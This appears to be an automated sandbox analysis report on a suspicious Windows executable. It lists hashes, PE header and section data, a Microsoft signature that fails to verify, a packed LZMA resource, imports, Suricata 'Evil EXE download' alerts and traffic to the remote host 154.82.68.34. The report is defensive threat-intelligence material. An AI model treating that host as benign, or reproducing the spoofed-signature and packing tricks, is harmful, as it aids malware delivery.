                                      MD5:e0596bfb4ce5773932f2c2047e2de77b
                                      SHA1:41120d88d333fad440718a288f29920f040cd832
                                      SHA256:74a4f68219998688ddd9e14d4a10c6c451cbd77f91f7ea0e27f8dd17f70eeaa9
                                      SHA512:17246a57b137ae445437fd168adaf436b9e907c3c47294ff43b4da149056274fb40935c0f3d351598dcd74e46f6d53e55e94a461bef547922dd49616f9b4682b
                                      SSDEEP:49152:+iEv35k+M4aZulnVkK4cvsZgtIQ94blEQn:+iykp4aZoVkmYgdilEQn
                                      TLSH:BD752220B6D04132F1B62A3059F18AB22A7EFD704F719A8F13555F2C1E358D2E639B67
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r...6i..6i..6i.."...=i.."....i..T...'i..T..."i......;i..T....i.."...%i.."...7i.."...;i..6i...i....p.7i..6i..`i......7i..Rich6i.

                                      File Icon

                                      Icon Hash:2f232d67b7934633

                                      Static PE Info

                                      General

                                      Entrypoint:0x4083f0
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x67291504 [Mon Nov 4 18:40:04 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:7899cb8ba886a0690bdc28d8b481bbd1

                                      Authenticode Signature

                                      Signature Valid:false
                                      Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                      Signature Validation Error:The digital signature of the object did not verify
                                      Error Number:-2146869232
                                      Not Before, Not After
                                      • 22/08/2024 20:26:44 20/08/2025 20:26:44
                                      Subject Chain
                                      • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                      Version:3
                                      Thumbprint MD5:FB871CDFBD500B74EE2AFA5A776E78E2
                                      Thumbprint SHA-1:04A696B6B949498D3DE9343B11BBFBA471539735
                                      Thumbprint SHA-256:0F619AD69C4C3DF0CBD718DB3AC011E0A774E8E7FCD3A549DCF735ABE6E6D71B
                                      Serial:33000003FE6BCEDAD6C80303A30000000003FE

                                      Entrypoint Preview

                                      Instruction
                                      call 00007FD878B54C58h
                                      jmp 00007FD878B5482Dh
                                      push ebp
                                      mov ebp, esp
                                      mov eax, dword ptr [ebp+08h]
                                      push esi
                                      mov ecx, dword ptr [eax+3Ch]
                                      add ecx, eax
                                      movzx eax, word ptr [ecx+14h]
                                      lea edx, dword ptr [ecx+18h]
                                      add edx, eax
                                      movzx eax, word ptr [ecx+06h]
                                      imul esi, eax, 28h
                                      add esi, edx
                                      cmp edx, esi
                                      je 00007FD878B549CBh
                                      mov ecx, dword ptr [ebp+0Ch]
                                      cmp ecx, dword ptr [edx+0Ch]
                                      jc 00007FD878B549BCh
                                      mov eax, dword ptr [edx+08h]
                                      add eax, dword ptr [edx+0Ch]
                                      cmp ecx, eax
                                      jc 00007FD878B549BEh
                                      add edx, 28h
                                      cmp edx, esi
                                      jne 00007FD878B5499Ch
                                      xor eax, eax
                                      pop esi
                                      pop ebp
                                      ret
                                      mov eax, edx
                                      jmp 00007FD878B549ABh
                                      push esi
                                      call 00007FD878B5515Ah
                                      test eax, eax
                                      je 00007FD878B549D2h
                                      mov eax, dword ptr fs:[00000018h]
                                      mov esi, 0042692Ch
                                      mov edx, dword ptr [eax+04h]
                                      jmp 00007FD878B549B6h
                                      cmp edx, eax
                                      je 00007FD878B549C2h
                                      xor eax, eax
                                      mov ecx, edx
                                      lock cmpxchg dword ptr [esi], ecx
                                      test eax, eax
                                      jne 00007FD878B549A2h
                                      xor al, al
                                      pop esi
                                      ret
                                      mov al, 01h
                                      pop esi
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      cmp dword ptr [ebp+08h], 00000000h
                                      jne 00007FD878B549B9h
                                      mov byte ptr [00426930h], 00000001h
                                      call 00007FD878B54F45h
                                      call 00007FD878B553FCh
                                      test al, al
                                      jne 00007FD878B549B6h
                                      xor al, al
                                      pop ebp
                                      ret
                                      call 00007FD878B586BCh
                                      test al, al
                                      jne 00007FD878B549BCh
                                      push 00000000h
                                      call 00007FD878B55403h
                                      pop ecx
                                      jmp 00007FD878B5499Bh
                                      mov al, 01h
                                      pop ebp
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      cmp byte ptr [00426931h], 00000000h
                                      je 00007FD878B549B6h
                                      mov al, 01h

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x243e40x78.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x290000x1661bc.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x18ca000x2850
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1900000x1574.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x235480x70.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x235c00x18.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x213c00x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x1c0000x250.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x242940x60.rdata
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x1aeea0x1b0000f140d4ee4f95218ff60ae14f8473ac6False0.5931712962962963data6.641440893172525IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x1c0000x91840x92006e95a617991351f1e642f84b23bbeac4False0.4382491438356164data5.019092394883451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x260000x142c0xa00c33b18d80d9f060b89a5448754befbd8False0.16875DOS executable (block device driver \277DN)2.22528073727486IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .didat0x280000x2c0x200c9f8bbfe97532ebceb89e7657ed12e43False0.07421875data0.43720409275959127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x290000x1661bc0x1662001d27dbc410ca67cb474668d4195930e3False0.9796909085951134data7.984686254408901IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x1900000x15740x1600022498aee4e0b1caa193919c0250401aFalse0.7668678977272727data6.53912725867614IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      B0x29b100x15b668LZMA compressed data, non-streamed, size 81965781.0003108978271484
                                      GOOGLEUPDATE0x1851780x4data3.0
                                      RT_ICON0x18517c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192, 16 important colorsEnglishUnited States0.6317567567567568
                                      RT_ICON0x1852a40x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.5823699421965318
                                      RT_ICON0x18580c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640, 16 important colorsEnglishUnited States0.5120967741935484
                                      RT_ICON0x185af40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.5455776173285198
                                      RT_ICON0x18639c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.36341463414634145
                                      RT_ICON0x186a040xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.42350746268656714
                                      RT_STRING0x1878ac0x130Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0ArabicSaudi Arabia0.625
                                      RT_STRING0x1879dc0x1b2Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0BulgarianBulgaria0.4792626728110599
                                      RT_STRING0x187b900x16eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0CatalanSpain0.5
                                      RT_STRING0x187d000xbaMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0ChineseTaiwan0.7096774193548387
                                      RT_STRING0x187dbc0x1beMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0CzechCzech Republic0.4798206278026906
                                      RT_STRING0x187f7c0x136Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0DanishDenmark0.532258064516129
                                      RT_STRING0x1880b40x192Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0GermanGermany0.46766169154228854
                                      RT_STRING0x1882480x192Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0GreekGreece0.527363184079602
                                      RT_STRING0x1883dc0x126Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0EnglishUnited States0.5306122448979592
                                      RT_STRING0x1885040x18cMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0FinnishFinland0.5025252525252525
                                      RT_STRING0x1886900x1c4Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0FrenchFrance0.4424778761061947
                                      RT_STRING0x1888540x108Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0HebrewIsrael0.6439393939393939
                                      RT_STRING0x18895c0x16cMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0HungarianHungary0.5494505494505495
                                      RT_STRING0x188ac80x170Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0IcelandicIceland0.48097826086956524
                                      RT_STRING0x188c380x1c8Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0ItalianItaly0.4232456140350877
                                      RT_STRING0x188e000xf6Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0JapaneseJapan0.6829268292682927
                                      RT_STRING0x188ef80xe0Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0KoreanNorth Korea0.7678571428571429
                                      RT_STRING0x188ef80xe0Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0KoreanSouth Korea0.7678571428571429
                                      RT_STRING0x188fd80x12eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0DutchNetherlands0.5165562913907285
                                      RT_STRING0x1891080x18cMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0NorwegianNorway0.45202020202020204
                                      RT_STRING0x1892940x168Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0PolishPoland0.5333333333333333
                                      RT_STRING0x1893fc0x142Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0PortugueseBrazil0.5341614906832298
                                      RT_STRING0x1895400x1a8Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0RomanianRomania0.46462264150943394
                                      RT_STRING0x1896e80x184dataRussianRussia0.5567010309278351
                                      RT_STRING0x18986c0x194Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0CroatianCroatia0.4628712871287129
                                      RT_STRING0x189a000x180Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0SlovakSlovakia0.5052083333333334
                                      RT_STRING0x189b800x156Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0AlbanianAlbania0.5087719298245614
                                      RT_STRING0x189cd80x17eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0SwedishSweden0.48429319371727747
                                      RT_STRING0x189e580x14cMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0ThaiThailand0.5843373493975904
                                      RT_STRING0x189fa40x148Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0TurkishTurkey0.5457317073170732
                                      RT_STRING0x18a0ec0x134Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0UrduPakistan0.5876623376623377
                                      RT_STRING0x18a0ec0x134Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0UrduIndia0.5876623376623377
                                      RT_STRING0x18a2200x160Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0IndonesianIndonesia0.5198863636363636
                                      RT_STRING0x18a3800x196dataUkrainianUkrain0.541871921182266
                                      RT_STRING0x18a5180x188Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0SlovenianSlovenia0.4719387755102041
                                      RT_STRING0x18a6a00x12cMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0EstonianEstonia0.53
                                      RT_STRING0x18a7cc0x152Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0LatvianLativa0.5384615384615384
                                      RT_STRING0x18a9200x164Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0LithuanianLithuania0.4943820224719101
                                      RT_STRING0x18aa840x13aMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0FarsiIran0.6050955414012739
                                      RT_STRING0x18aa840x13aMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0FarsiAfganistan0.6050955414012739
                                      RT_STRING0x18aa840x13aMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0FarsiTajikistan0.6050955414012739
                                      RT_STRING0x18aa840x13aMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0FarsiUzbekistan0.6050955414012739
                                      RT_STRING0x18abc00x156Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0VietnameseVietnam0.5380116959064327
                                      RT_STRING0x18ad180x16aMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0AzeriItaly0.5248618784530387
                                      RT_STRING0x18ae840x15eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0BasqueFrance0.4828571428571429
                                      RT_STRING0x18ae840x15eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0BasqueSpain0.4828571428571429
                                      RT_STRING0x18afe40x194Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0FYRO MacedoniaMacedonia0.4801980198019802
                                      RT_STRING0x18b1780x136Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0AfrikaansSouth Africa0.4967741935483871
                                      RT_STRING0x18b1780x136Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0AfrikaansNamibia0.4967741935483871
                                      RT_STRING0x18b2b00x148Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0GeorgianGeorgia0.5457317073170732
                                      RT_STRING0x18b3f80x126Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0HindiIndia0.608843537414966
                                      RT_STRING0x18b5200x156Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0MalteseMalta0.5350877192982456
                                      RT_STRING0x18b6780x138Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0MalayMalaysia0.5288461538461539
                                      RT_STRING0x18b7b00x17eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0KazakhKazakhstan0.5130890052356021
                                      RT_STRING0x18b9300x178dataTatarRussia0.574468085106383
                                      RT_STRING0x18baa80x13eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0BengaliIndia0.5880503144654088
                                      RT_STRING0x18bbe80x122Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0PunjabiPakistan0.6310344827586207
                                      RT_STRING0x18bbe80x122Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0PunjabiIndia0.6310344827586207
                                      RT_STRING0x18bd0c0x134Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0GujaratiIndia0.6168831168831169
                                      RT_STRING0x18be400x12eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0OriyaIndia0.5827814569536424
                                      RT_STRING0x18bf700x15aMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0TamilIndia0.5664739884393064
                                      RT_STRING0x18bf700x15aMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0TamilSri Lanka0.5664739884393064
                                      RT_STRING0x18c0cc0x14cMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0TeluguIndia0.5602409638554217
                                      RT_STRING0x18c2180x12eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0KannadaKanada0.6192052980132451
                                      RT_STRING0x18c3480x16eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0MalayalamIndia0.5737704918032787
                                      RT_STRING0x18c4b80x124Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0AssameseIndia0.6301369863013698
                                      RT_STRING0x18c5dc0x132Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0MarathiIndia0.5686274509803921
                                      RT_STRING0x18c7100x12aMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0WelshEngland0.5369127516778524
                                      RT_STRING0x18c83c0x126Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0KhmerVietnam0.6496598639455783
                                      RT_STRING0x18c83c0x126Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0KhmerThailand0.6496598639455783
                                      RT_STRING0x18c9640x130Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0LaoLaos0.6546052631578947
                                      RT_STRING0x18ca940x14aMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0GalicianItaly0.5
                                      RT_STRING0x18cbe00x118Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0KonkaniIndia0.5892857142857143
                                      RT_STRING0x18ccf80xe8Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0AmharicEthiopia0.7543103448275862
                                      RT_STRING0x18cde00x120Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0NepaliNepal0.6111111111111112
                                      RT_STRING0x18cf000x150Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0FilipinoPhilippines0.5059523809523809
                                      RT_STRING0x18d0500x160Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 00.5255681818181818
                                      RT_STRING0x18d1b00x154Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 00.5617647058823529
                                      RT_STRING0x18d3040x13cMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0MaoriNew Zealand0.5443037974683544
                                      RT_STRING0x18d4400x170Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 00.5081521739130435
                                      RT_STRING0x18d5b00x1a6Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 00.4976303317535545
                                      RT_STRING0x18d7580xbeMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0ChineseChina0.7105263157894737
                                      RT_STRING0x18d8180x126Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0EnglishGreat Britain0.5306122448979592
                                      RT_STRING0x18d9400x150Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0SpanishMexico0.5
                                      RT_STRING0x18da900x18eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0NorwegianNorway0.45226130653266333
                                      RT_STRING0x18dc200x156Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0PortuguesePortugal0.5146198830409356
                                      RT_STRING0x18dd780x150Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0SerbianItaly0.5803571428571429
                                      RT_STRING0x18dec80x13eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0GaelicIreland0.559748427672956
                                      RT_STRING0x18e0080x13eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0BengaliBangladesh0.5880503144654088
                                      RT_STRING0x18e1480x13eMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 00.5220125786163522
                                      RT_STRING0x18e2880x1c4Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0FrenchCanada0.4424778761061947
                                      RT_STRING0x18e44c0x132Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 00.5261437908496732
                                      RT_STRING0x18e5800x18aMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 0BosnianBosnian0.4517766497461929
                                      RT_STRING0x18e70c0x150Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 00.5803571428571429
                                      RT_STRING0x18e85c0x17cMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 00.45789473684210524
                                      RT_STRING0x18e9d80x17aMatlab v4 mat-file (little endian) M, numeric, rows 0, columns 00.5
                                      RT_GROUP_ICON0x18eb540x5adataEnglishUnited States0.7333333333333333
                                      RT_VERSION0x18ebb00x3c8dataEnglishUnited States0.3977272727272727
                                      RT_MANIFEST0x18ef780x244XML 1.0 document, ASCII text, with CRLF line terminatorsChineseChina0.453448275862069

                                      Imports

                                      DLLImport
                                      KERNEL32.dllGetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, OutputDebugStringW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, RaiseException, LCMapStringW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle, WriteConsoleW, DecodePointer, VirtualProtect, EncodePointer, LoadLibraryExW, QueryPerformanceCounter, GetProcAddress, FreeLibrary, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, SetLastError, GetLastError, RtlUnwind, TerminateProcess, GetCurrentProcess, GetModuleHandleW, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, GetStringTypeW, CreateDirectoryW, SizeofResource, FindFirstFileW, Wow64DisableWow64FsRedirection, RemoveDirectoryW, GetTempPathW, FormatMessageW, Wow64RevertWow64FsRedirection, GetFileAttributesExW, GetDiskFreeSpaceExW, LockResource, DeleteFileW, FindResourceExW, LoadResource, FindResourceW, HeapDestroy, LocalFree, VerSetConditionMask, CopyFileW, VerifyVersionInfoW, GetTempFileNameW, lstrcmpiW, CreateMutexW, WaitForSingleObject, ReleaseMutex, CreateEventW, SetEvent, CreateThread, UnmapViewOfFile, CreateFileMappingW, MapViewOfFile, VirtualQuery, CreateProcessW, GetExitCodeProcess, ResetEvent, WaitForSingleObjectEx, GetSystemInfo, LoadLibraryExA
                                      ADVAPI32.dllRegSetValueExA, SetSecurityDescriptorDacl, GetAclInformation, SetSecurityDescriptorOwner, GetSidSubAuthority, GetSidLengthRequired, CopySid, InitializeSid, IsValidSid, AddAce, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, GetSecurityDescriptorLength, MakeSelfRelativeSD, MakeAbsoluteSD, SetSecurityDescriptorGroup, RegOpenKeyExW, RegQueryValueExW, GetSecurityDescriptorSacl, GetSecurityDescriptorDacl, GetSecurityDescriptorGroup, GetSecurityDescriptorControl, GetSecurityDescriptorOwner, RegCloseKey, RegQueryValueExA, RegCreateKeyExA, RegSetValueExW, RegOpenKeyExA, RegDeleteValueA
                                      ole32.dllCoTaskMemFree, CoUninitialize, CoInitializeEx
                                      SHELL32.dllSHGetKnownFolderPath, CommandLineToArgvW, SHGetFolderPathW
                                      USER32.dllCharLowerBuffW, MessageBoxW

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      ArabicSaudi Arabia
                                      BulgarianBulgaria
                                      CatalanSpain
                                      ChineseTaiwan
                                      CzechCzech Republic
                                      DanishDenmark
                                      GermanGermany
                                      GreekGreece
                                      FinnishFinland
                                      FrenchFrance
                                      HebrewIsrael
                                      HungarianHungary
                                      IcelandicIceland
                                      ItalianItaly
                                      JapaneseJapan
                                      KoreanNorth Korea
                                      KoreanSouth Korea
                                      DutchNetherlands
                                      NorwegianNorway
                                      PolishPoland
                                      PortugueseBrazil
                                      RomanianRomania
                                      RussianRussia
                                      CroatianCroatia
                                      SlovakSlovakia
                                      AlbanianAlbania
                                      SwedishSweden
                                      ThaiThailand
                                      TurkishTurkey
                                      UrduPakistan
                                      UrduIndia
                                      IndonesianIndonesia
                                      UkrainianUkrain
                                      SlovenianSlovenia
                                      EstonianEstonia
                                      LatvianLativa
                                      LithuanianLithuania
                                      FarsiIran
                                      FarsiAfganistan
                                      FarsiTajikistan
                                      FarsiUzbekistan
                                      VietnameseVietnam
                                      FYRO MacedoniaMacedonia
                                      AfrikaansSouth Africa
                                      AfrikaansNamibia
                                      GeorgianGeorgia
                                      MalteseMalta
                                      MalayMalaysia
                                      KazakhKazakhstan
                                      TamilSri Lanka
                                      KannadaKanada
                                      WelshEngland
                                      LaoLaos
                                      AmharicEthiopia
                                      NepaliNepal
                                      FilipinoPhilippines
                                      MaoriNew Zealand
                                      ChineseChina
                                      EnglishGreat Britain
                                      SpanishMexico
                                      PortuguesePortugal
                                      GaelicIreland
                                      BengaliBangladesh
                                      FrenchCanada
                                      BosnianBosnian

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-22T08:37:03.561689+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11154.82.68.3416653192.168.2.449730TCP
                                      2024-12-22T08:37:04.046985+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M21154.82.68.3416653192.168.2.449730TCP
                                      2024-12-22T08:37:08.199060+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11154.82.68.3416653192.168.2.449730TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 22, 2024 08:37:01.675098896 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:01.795275927 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:01.795536995 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:01.795614958 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:01.915242910 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.334145069 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.334203005 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.334239006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.334275007 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.334311008 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.334361076 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.334362030 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.334362030 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.334362030 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.334362030 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.561688900 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.561726093 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.561760902 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.561780930 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.561780930 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.561799049 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.561830997 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.561852932 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.681292057 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.681308985 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.681325912 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.681341887 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.681343079 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.681359053 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.681376934 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.681376934 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.681376934 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.681395054 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.681408882 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.681408882 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.681433916 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.681433916 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.789482117 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.789576054 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:03.789589882 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:03.789634943 CET4973016653192.168.2.4154.82.68.34
